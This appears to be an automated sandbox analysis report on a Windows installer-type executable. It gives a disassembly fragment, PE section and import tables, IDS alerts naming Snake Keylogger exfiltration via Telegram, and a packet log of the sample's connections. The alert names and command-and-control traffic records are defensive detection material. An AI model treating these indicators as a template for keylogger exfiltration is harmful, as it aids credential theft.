                                                                                                                                push 00420690h
                                                                                                                                call dword ptr [0040717Ch]
                                                                                                                                push 0040937Ch
                                                                                                                                push 004281E0h
                                                                                                                                call 00007FAC6891ADB7h
                                                                                                                                call dword ptr [00407134h]
                                                                                                                                mov ebx, 00434000h
                                                                                                                                push eax
                                                                                                                                push ebx
                                                                                                                                call 00007FAC6891ADA5h
                                                                                                                                push ebp
                                                                                                                                call dword ptr [0040710Ch]
                                                                                                                                cmp word ptr [00434000h], 0022h
                                                                                                                                mov dword ptr [004291E0h], eax
                                                                                                                                mov eax, ebx
                                                                                                                                jne 00007FAC6891829Ah
                                                                                                                                push 00000022h
                                                                                                                                mov eax, 00434002h
                                                                                                                                pop esi
                                                                                                                                push esi
                                                                                                                                push eax
                                                                                                                                call 00007FAC6891A7F6h
                                                                                                                                push eax
                                                                                                                                call dword ptr [00407240h]
                                                                                                                                mov dword ptr [esp+18h], eax
                                                                                                                                jmp 00007FAC6891835Eh
                                                                                                                                push 00000020h
                                                                                                                                pop edx
                                                                                                                                cmp cx, dx
                                                                                                                                jne 00007FAC68918299h
                                                                                                                                inc eax
                                                                                                                                inc eax
                                                                                                                                cmp word ptr [eax], dx
                                                                                                                                je 00007FAC6891828Bh
                                                                                                                                add word ptr [eax], 0000h
                                                                                                                                Programming Language:
                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x5f0000x43188.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x10000x5e680x60002f6554958e1a5093777de617d6e0bffcFalse0.6566162109375data6.419811957742583IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .data0x90000x202d80x6009587277f9a9b39e2caf86eae07909d87False0.4733072916666667data3.757932017065988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .ndata0x2a0000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .rsrc0x5f0000x431880x43200ad79ab7bc0418c21ba04b90eb50d4a0cFalse0.18500494646182494data4.605797713668011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_BITMAP0x5f2b00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                RT_ICON0x5f6180x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.1810552711779152
                                                                                                                                RT_DIALOG0xa16400x144dataEnglishUnited States0.5216049382716049
                                                                                                                                RT_DIALOG0xa17880x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                RT_DIALOG0xa18c80x100dataEnglishUnited States0.5234375
                                                                                                                                RT_DIALOG0xa19c80x11cdataEnglishUnited States0.6091549295774648
                                                                                                                                RT_DIALOG0xa1ae80xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                RT_DIALOG0xa1bb00x60dataEnglishUnited States0.7291666666666666
                                                                                                                                RT_GROUP_ICON0xa1c100x14dataEnglishUnited States1.1
                                                                                                                                RT_VERSION0xa1c280x258dataEnglishUnited States0.5216666666666666
                                                                                                                                RT_MANIFEST0xa1e800x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                                                                                DLLImport
                                                                                                                                KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                                                                USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                                ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                                                VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                EnglishUnited States
                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2024-12-09T08:32:34.475462+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949711172.217.19.174443TCP
                                                                                                                                2024-12-09T08:32:43.321758+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949714132.226.247.7380TCP
                                                                                                                                2024-12-09T08:32:51.134363+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949714132.226.247.7380TCP
                                                                                                                                2024-12-09T08:32:53.286833+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949732149.154.167.220443TCP
                                                                                                                                2024-12-09T08:32:54.931232+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949737132.226.247.7380TCP
                                                                                                                                2024-12-09T08:32:56.876763+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949739149.154.167.220443TCP
                                                                                                                                2024-12-09T08:33:00.521871+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949750149.154.167.220443TCP
                                                                                                                                2024-12-09T08:33:04.094949+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949758149.154.167.220443TCP
                                                                                                                                2024-12-09T08:33:07.653342+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949770149.154.167.220443TCP
                                                                                                                                2024-12-09T08:33:11.270293+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949780149.154.167.220443TCP
                                                                                                                                2024-12-09T08:33:14.832911+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949789149.154.167.220443TCP
                                                                                                                                2024-12-09T08:33:18.273066+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949800149.154.167.220443TCP
                                                                                                                                2024-12-09T08:33:21.725921+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949810149.154.167.220443TCP
                                                                                                                                2024-12-09T08:33:25.145721+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949820149.154.167.220443TCP
                                                                                                                                2024-12-09T08:33:28.575097+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949831149.154.167.220443TCP
                                                                                                                                2024-12-09T08:33:32.007339+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949840149.154.167.220443TCP
                                                                                                                                2024-12-09T08:33:35.485405+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949850149.154.167.220443TCP
                                                                                                                                2024-12-09T08:33:38.920720+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949860149.154.167.220443TCP
                                                                                                                                2024-12-09T08:33:42.432226+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.949870149.154.167.220443TCP
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 9, 2024 08:32:31.847513914 CET49711443192.168.2.9172.217.19.174
                                                                                                                                Dec 9, 2024 08:32:31.847558975 CET44349711172.217.19.174192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:31.847686052 CET49711443192.168.2.9172.217.19.174
                                                                                                                                Dec 9, 2024 08:32:31.884860039 CET49711443192.168.2.9172.217.19.174
                                                                                                                                Dec 9, 2024 08:32:31.884882927 CET44349711172.217.19.174192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:33.583551884 CET44349711172.217.19.174192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:33.583631039 CET49711443192.168.2.9172.217.19.174
                                                                                                                                Dec 9, 2024 08:32:33.584357977 CET44349711172.217.19.174192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:33.584425926 CET49711443192.168.2.9172.217.19.174
                                                                                                                                Dec 9, 2024 08:32:33.645111084 CET49711443192.168.2.9172.217.19.174
                                                                                                                                Dec 9, 2024 08:32:33.645154953 CET44349711172.217.19.174192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:33.645544052 CET44349711172.217.19.174192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:33.645608902 CET49711443192.168.2.9172.217.19.174
                                                                                                                                Dec 9, 2024 08:32:33.649291039 CET49711443192.168.2.9172.217.19.174
                                                                                                                                Dec 9, 2024 08:32:33.691337109 CET44349711172.217.19.174192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:34.475440025 CET44349711172.217.19.174192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:34.476150036 CET44349711172.217.19.174192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:34.476265907 CET49711443192.168.2.9172.217.19.174
                                                                                                                                Dec 9, 2024 08:32:34.477359056 CET49711443192.168.2.9172.217.19.174
                                                                                                                                Dec 9, 2024 08:32:34.477369070 CET44349711172.217.19.174192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:34.638808012 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:34.638855934 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:34.639065981 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:34.639456034 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:34.639470100 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:36.332391024 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:36.332457066 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:36.336570978 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:36.336582899 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:36.336951971 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:36.337006092 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:36.337445974 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:36.379340887 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.433552980 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.433653116 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.446182966 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.446253061 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.552191973 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.552432060 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.552450895 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.552519083 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.556251049 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.556340933 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.625096083 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.625271082 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.628897905 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.628999949 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.629033089 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.629096031 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.634741068 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.634824991 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.642541885 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.642664909 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.643968105 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.644022942 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.651835918 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.651906967 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.653475046 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.653563023 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.660990000 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.661061049 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.666584969 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.666642904 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.670192003 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.670253992 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.680802107 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.680900097 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.686408043 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.686484098 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.694396973 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.694484949 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.697289944 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.697381020 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.707355976 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.707439899 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.710315943 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.710412025 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.722568989 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.722716093 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.724977970 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.725075006 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.734327078 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.734430075 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.737277985 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.737334013 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.755491972 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.755609035 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.755620956 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.755678892 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.768995047 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.769104958 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.782888889 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.783029079 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.783056974 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.783140898 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.816704988 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.816883087 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.816914082 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.817025900 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.818932056 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.819016933 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.823394060 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.823457003 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.823513985 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.823573112 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.826975107 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.827151060 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.827162027 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.827224016 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.834904909 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.834997892 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.835213900 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.835266113 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.835274935 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.835326910 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.845642090 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.845774889 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.845796108 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.845896006 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.856415033 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.856600046 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.856614113 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.856688023 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.866518021 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.866686106 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.866697073 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.866750956 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.876542091 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.876657009 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.876667023 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.876769066 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.886564970 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.886657000 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.886718988 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.886811018 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.896648884 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.896756887 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.896792889 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.896913052 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.907244921 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.907404900 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.907414913 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.907489061 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.917418957 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.917531013 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.917546988 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.917603016 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.926302910 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.926433086 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.926454067 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.926520109 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.936996937 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.937150002 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.937164068 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.937249899 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.945265055 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.945410013 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.945425987 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.945530891 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.952692032 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.952838898 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.953047991 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.953114033 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.953124046 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.953206062 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.954179049 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.954236031 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.954356909 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:39.954401970 CET44349712142.250.181.33192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:39.954457045 CET49712443192.168.2.9142.250.181.33
                                                                                                                                Dec 9, 2024 08:32:41.419172049 CET4971480192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:32:41.538598061 CET8049714132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:41.538803101 CET4971480192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:32:41.539978027 CET4971480192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:32:41.659280062 CET8049714132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:42.848786116 CET8049714132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:42.854034901 CET4971480192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:32:42.973778963 CET8049714132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:43.277419090 CET8049714132.226.247.73192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:43.321758032 CET4971480192.168.2.9132.226.247.73
                                                                                                                                Dec 9, 2024 08:32:43.679121017 CET49715443192.168.2.9172.67.177.134
                                                                                                                                Dec 9, 2024 08:32:43.679169893 CET44349715172.67.177.134192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:43.679239988 CET49715443192.168.2.9172.67.177.134
                                                                                                                                Dec 9, 2024 08:32:43.682146072 CET49715443192.168.2.9172.67.177.134
                                                                                                                                Dec 9, 2024 08:32:43.682158947 CET44349715172.67.177.134192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:44.896400928 CET44349715172.67.177.134192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:44.896598101 CET49715443192.168.2.9172.67.177.134
                                                                                                                                Dec 9, 2024 08:32:44.961251020 CET49715443192.168.2.9172.67.177.134
                                                                                                                                Dec 9, 2024 08:32:44.961302042 CET44349715172.67.177.134192.168.2.9
                                                                                                                                Dec 9, 2024 08:32:44.961694002 CET44349715172.67.177.134192.168.2.9
